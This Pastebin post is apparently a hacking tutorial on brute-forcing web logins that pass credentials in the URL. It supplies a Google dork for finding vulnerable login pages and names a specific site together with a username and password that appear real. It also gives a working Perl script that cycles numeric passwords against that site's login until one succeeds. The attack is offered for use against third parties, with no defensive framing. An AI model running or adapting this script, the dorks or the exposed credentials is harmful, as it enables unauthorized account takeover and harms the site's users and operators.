Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- In this tutorial I will show you how to Dictionary Attack & Bruteforce logins using Scripts.The way the script hacks the site is setting variable's in the URL which are then recieved by the website's PHP scripts.
- First here are a few google dorks that you can use to find vulnerable sites:
- Code:
- inurl:"login.php?username="
- So Ive now found my site:
- Code:
- http://www.2wapworld.com/login.php?username=dhudha08&password=2272941
- We now know that there is a user called 'dhudha08' and Its appears he likes to use a mixture of numbers for his password.
- Now we will use dorks to attempt to find more users...
- Code:
- inurl:http://www.2wapworld.com/login.php?username=
- Unfortunately we dont manage to find any more users so now Its time to create are script.
- Here's mine in perl I will be using numbers because of the password that we attempted to login with:
- Code:
- #!usr/bin/perl
- #http://www.2wapworld.com/login.php?username=dhudha08&password=2272941
- use LWP::Simple;
- $pass=0;
- $fail=get("http://www.2wapworld.com/login.php?username=dhudha08&password=FAIL");
- while(1==1){
- $test=get("http://www.2wapworld.com/login.php?username=dhudha08&password=".$pass);
- if ($test eq $fail){
- system("cls");
- print $pass;
- }
- else{
- print "Password is:$pass\n";
- system("pause>nul");
- }
- $pass=$pass+1;
- }
- Now open your program it will start a dictionary attack against the site!
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
